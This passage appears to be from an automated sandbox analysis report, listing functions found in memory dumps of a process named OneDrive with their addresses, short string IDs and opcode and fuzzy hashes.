                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: b620b6fd74ea9b35e2d6bad4d2eb75ecf2bef46ae9626e86426f657a8a51b5e2
                    • Instruction ID: a2212cdab4e6421246472e0f20201ded64c7eafb13befe0ada9d00724668390e
                    • Opcode Fuzzy Hash: b620b6fd74ea9b35e2d6bad4d2eb75ecf2bef46ae9626e86426f657a8a51b5e2
                    • Instruction Fuzzy Hash: CC71F422B1C98A4FE654AA6CA4553FC77D1FFC5365B0806BBE14CCB1D3DD189C4A8391
                    Function 00007FF887B004E0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 3df82889963ee290e67889211967e489c65cc02cb7e0f2f564fec7605e7c4670
                    • Instruction ID: b24fcfe94862e40b0670dc42a27d1df58922085c4d457ac008faf81689957e46
                    • Opcode Fuzzy Hash: 3df82889963ee290e67889211967e489c65cc02cb7e0f2f564fec7605e7c4670
                    • Instruction Fuzzy Hash: 6131A221B2894D4FE698EB6C946937DA6D2FFD9751F4405BEE00EC32D3DD289C418741
                    Function 00007FF887B00AC1 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y
                    • API String ID: 0-1547487790
                    • Opcode ID: bcb9b764cfb7265dc2c9b11a38c5d010aec618f7951caeb61a76ad1cd186df3a
                    • Instruction ID: 27512e33ac69baffc5ba643eafca30979b47cd2d110bd45fe0bfd6dc81cf3a68
                    • Opcode Fuzzy Hash: bcb9b764cfb7265dc2c9b11a38c5d010aec618f7951caeb61a76ad1cd186df3a
                    • Instruction Fuzzy Hash: BA31B221F1C9494FEB84B7AC585A3BD77E2FFA9651F4442B6E00DC7293DE2C58418352
                    Function 00007FF887B00C2E Relevance: .8, Instructions: 768COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f00946b2c8ef881c665810623712a5a331dc944e54b313fa256892d8aaff65e
                    • Instruction ID: 5b64f4848bd3672db2a323cbd76ff653f220b249b2b94fe0423661f36d1e5d30
                    • Opcode Fuzzy Hash: 5f00946b2c8ef881c665810623712a5a331dc944e54b313fa256892d8aaff65e
                    • Instruction Fuzzy Hash: 18910331A1CA8A4FE796E76898662FD7BF2FF86250B4900BBC04DDB193CD1C6C468351
                    Function 00007FF887B00975 Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dcd1eda890f9dd0266ba85e17c08204d67ef876ec281cb26ce559089c4af103d
                    • Instruction ID: 5bc404e8866ca0a966701b6c62c3bc326fe01669c536c771049ab6bba80a4b97
                    • Opcode Fuzzy Hash: dcd1eda890f9dd0266ba85e17c08204d67ef876ec281cb26ce559089c4af103d
                    • Instruction Fuzzy Hash: B2318E71A68A0E8FEB88EBACD4557FD77B2FF98340F900579D009D7286CE38A8418741
                    Function 00007FF887B00868 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67385f1341c0f4c59221985af006d36e170ba7aff9d75abcfc7421d6d8d15767
                    • Instruction ID: 1a40f19164db9cf5a474b08ca253e48fd26039df13b52b59cd972334efd84f6a
                    • Opcode Fuzzy Hash: 67385f1341c0f4c59221985af006d36e170ba7aff9d75abcfc7421d6d8d15767
                    • Instruction Fuzzy Hash: 48219271A6C64D5FD788EBAC90566F97B61FF88300B81456DD409C73CECE286904C782
                    Function 00007FF887B01E91 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d032333b443d4920bca5f463fe78fa39eb698bf79b7e9b2a6ec09c8b17941ba6
                    • Instruction ID: 514560c480b3bf3013a96299efb7ccaa8e593d7883d16dac7a6f11a854459152
                    • Opcode Fuzzy Hash: d032333b443d4920bca5f463fe78fa39eb698bf79b7e9b2a6ec09c8b17941ba6
                    • Instruction Fuzzy Hash: 1901262090C7844FD78AA73C685447D7FF1EFD6290B0805EBE489CB197D8186989C382

                    Executed Functions

                    Function 00007FF887B312B9 Relevance: 10.8, Strings: 8, Instructions: 846COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$L_H$"ry$/y$/y
                    • API String ID: 0-815725436
                    • Opcode ID: 921da57540d9f95116d6b42e6c486b04007037556a8f6bb34dff226082a3cacd
                    • Instruction ID: 3ed0a87f9ced703666651b511598e38f5c41d4ec2fe6ade7bc26eee7584e98f1
                    • Opcode Fuzzy Hash: 921da57540d9f95116d6b42e6c486b04007037556a8f6bb34dff226082a3cacd
                    • Instruction Fuzzy Hash: E0429831B6C94A4FEB98EB7894597BDB7E2FF98740F440579E40DC32D2DD28A8418742
                    Function 00007FF887B31CDD Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 47be5144a177a70481ee75d92c43ff7b710484d4218279ea20db2a9f86269752
                    • Instruction ID: d21d033ee940e9cf8a690d717b981062995f6d2c9eb99121104e9a68a81b226f
                    • Opcode Fuzzy Hash: 47be5144a177a70481ee75d92c43ff7b710484d4218279ea20db2a9f86269752
                    • Instruction Fuzzy Hash: 9851E220A5DACA4FD786AB7858242797FE5EF87255B0805FBE08DC71E3DD185846C342
                    Function 00007FF887B304E5 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: ea52eb94ad734dde97799c9a2125b73722f76e6e4e91d55bb0bf4dad310a01fd
                    • Instruction ID: 0cc2e2b349a18562536d2cea4b88e8aeb88acf79c6c7bcc8265bf6112898b6c2
                    • Opcode Fuzzy Hash: ea52eb94ad734dde97799c9a2125b73722f76e6e4e91d55bb0bf4dad310a01fd
                    • Instruction Fuzzy Hash: 67710822F1C98A0FE754AAACA8562FD77D2FF853A1B0801BBE04DC71D3DD1C58468782
                    Function 00007FF887B304E0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 9e286b75abf4d8337a7419a92dec9c865ebe47520131c8a117a88e96ecacb24f
                    • Instruction ID: 078771a31c1a549b9f97c8529f2af10fc37976ec6fae5611a5653f86bac20b0c
                    • Opcode Fuzzy Hash: 9e286b75abf4d8337a7419a92dec9c865ebe47520131c8a117a88e96ecacb24f
                    • Instruction Fuzzy Hash: C031A221B2894D4FE698EB6C945A379B6D2EFD9751F4405BAE00EC32D3DD289C418742
                    Function 00007FF887B30AC1 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y
                    • API String ID: 0-1547487790
                    • Opcode ID: e29b0ce6ee5a98405b6d80ad13ac23569d76d940e6aea935c894d490241688fd
                    • Instruction ID: a30957fea3f7aaaa841cd143ce0581913ab742c67f958e564984371d836795f7
                    • Opcode Fuzzy Hash: e29b0ce6ee5a98405b6d80ad13ac23569d76d940e6aea935c894d490241688fd
                    • Instruction Fuzzy Hash: BF31B221F1C94A4FEB84B7EC581A3BD77E2EFA9651F4402B6E00DC3283DE2C58418392
                    Function 00007FF887B30C2E Relevance: .8, Instructions: 766COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 146473a96c334033a05960f8902e79386e4d89eb335e2ae3f6182ce50bc2e792
                    • Instruction ID: 1bf6896f9db90c430acf8dd71ed6a8311cf0f53c802896d53321b5374e5aec39
                    • Opcode Fuzzy Hash: 146473a96c334033a05960f8902e79386e4d89eb335e2ae3f6182ce50bc2e792
                    • Instruction Fuzzy Hash: BD91E631E5CA8A4FE786E7A898652FD7BF2FF86250B4800BAD44DC7193DD1C6846C352
                    Function 00007FF887B30975 Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cad8f0a8130e1b23b184ac53723aa4c3bf5c5454dfce2953149db9f95172c2bd
                    • Instruction ID: 314846753f896748662502c347d1e64d755563774126f35f4f8df08b236e3455
                    • Opcode Fuzzy Hash: cad8f0a8130e1b23b184ac53723aa4c3bf5c5454dfce2953149db9f95172c2bd
                    • Instruction Fuzzy Hash: 68317371A6890E4FEB48EBA8D4557EDB7F2FF98340F500579E009D3286DE38A845C741
                    Function 00007FF887B30868 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f1cf549ebf1bfdf281d738502effa9b65d18cf77ccafc75233b34f4c77cb7c19
                    • Instruction ID: 80374da765fc205adef7a382ea0e1f4e43dacae5d558cf783d1f6f8a2ea9ff71
                    • Opcode Fuzzy Hash: f1cf549ebf1bfdf281d738502effa9b65d18cf77ccafc75233b34f4c77cb7c19
                    • Instruction Fuzzy Hash: B721777166850D5FEB88EFA89055AE9BB71FF98300F804569F509C33CACE386940CB92
                    Function 00007FF887B31E91 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2554786149.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7ff887b30000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8225e5e570635d457b563d2224f5da0d76c8e93accc9cb07cbe69af98fa6642e
                    • Instruction ID: 71284368710f5aaf592c26ef7d67059e711c477a60c6ff57bd34276a2c8b7738
                    • Opcode Fuzzy Hash: 8225e5e570635d457b563d2224f5da0d76c8e93accc9cb07cbe69af98fa6642e
                    • Instruction Fuzzy Hash: 30014E3490CB950FE745AB3C58554757FF1DFD5380B0805EBE888CB1D7D8185985C392